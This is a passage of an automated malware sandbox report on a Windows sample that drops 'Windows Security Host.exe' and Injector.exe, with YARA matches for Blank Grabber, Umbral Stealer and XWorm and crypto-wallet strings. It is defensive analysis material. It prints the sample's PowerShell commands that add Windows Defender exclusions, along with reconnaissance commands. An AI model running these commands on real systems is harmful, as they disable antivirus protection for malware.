                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeProcess created: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe "C:\Users\user~1\AppData\Local\Temp\BootstrapperV1.23.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuidJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Windows Security Host.exe'Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Security Host.exe'Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Windows Security Host.exe'Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Security Host.exe'Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c ipconfig /allJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /allJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeQueries volume information: C:\Users\user\Desktop\8Hd0ZExgJz.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Injector.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeQueries volume information: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Users\user\Windows Security Host.exeQueries volume information: C:\Users\user\Windows Security Host.exe VolumeInformation
                    Source: C:\Users\user\Windows Security Host.exeQueries volume information: C:\Users\user\Windows Security Host.exe VolumeInformation
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: Amcache.hve.23.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                    Source: Amcache.hve.23.drBinary or memory string: msmpeng.exe
                    Source: Amcache.hve.23.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                    Source: Amcache.hve.23.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                    Source: Windows Security Host.exe, 00000003.00000002.2487632823.000000001B564000.00000004.00000020.00020000.00000000.sdmp, Windows Security Host.exe, 00000003.00000002.2487632823.000000001B5B2000.00000004.00000020.00020000.00000000.sdmp, Windows Security Host.exe, 00000003.00000002.2487632823.000000001B5E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: Amcache.hve.23.drBinary or memory string: MsMpEng.exe
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                    Stealing of Sensitive Information

                    barindex
                    Yara detected Blank Grabber
                    Source: Yara matchFile source: 2.0.Injector.exe.242bb8d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000000.1256332897.00000242BB8D2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Injector.exe PID: 2404, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Injector.exe, type: DROPPED
                    Yara detected Umbral Stealer
                    Source: Yara matchFile source: 2.0.Injector.exe.242bb8d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000000.1256332897.00000242BB8D2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Injector.exe PID: 2404, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Injector.exe, type: DROPPED
                    Yara detected XWorm
                    Source: Yara matchFile source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.0.Windows Security Host.exe.450000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1259484875.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000000.1257101643.0000000000452000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 8Hd0ZExgJz.exe PID: 6440, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Windows Security Host.exe PID: 6296, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\Windows Security Host.exe, type: DROPPED
                    Found many strings related to Crypto-Wallets (likely being stolen)
                    Source: Injector.exe, 00000002.00000000.1256332897.00000242BB8D2000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: Electrum
                    Source: Injector.exe, 00000002.00000000.1256332897.00000242BB8D2000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: BytecoinJaxx!com.liberty.jaxx
                    Source: Injector.exe, 00000002.00000000.1256332897.00000242BB8D2000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: Exodus
                    Source: Injector.exe, 00000002.00000000.1256332897.00000242BB8D2000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: Ethereum
                    Source: Injector.exe, 00000002.00000000.1256332897.00000242BB8D2000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: keystore
                    Source: Yara matchFile source: Process Memory Space: Injector.exe PID: 2404, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected Blank Grabber
                    Source: Yara matchFile source: 2.0.Injector.exe.242bb8d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000000.1256332897.00000242BB8D2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Injector.exe PID: 2404, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Injector.exe, type: DROPPED
                    Yara detected Umbral Stealer
                    Source: Yara matchFile source: 2.0.Injector.exe.242bb8d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000000.1256332897.00000242BB8D2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Injector.exe PID: 2404, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Injector.exe, type: DROPPED
                    Yara detected XWorm
                    Source: Yara matchFile source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.0.Windows Security Host.exe.450000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1259484875.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000000.1257101643.0000000000452000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 8Hd0ZExgJz.exe PID: 6440, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Windows Security Host.exe PID: 6296, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\Windows Security Host.exe, type: DROPPED

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		11
                    Disable or Modify Tools                    		OS Credential Dumping1
                    File and Directory Discovery                    		Remote Services11
                    Archive Collected Data                    		1
                    Ingress Tool Transfer                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    PowerShell                    		21
                    Registry Run Keys / Startup Folder                    		11
                    Process Injection                    		1
                    Deobfuscate/Decode Files or Information                    		LSASS Memory23
                    System Information Discovery                    		Remote Desktop Protocol1
                    Data from Local System                    		11
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)21
                    Registry Run Keys / Startup Folder                    		21
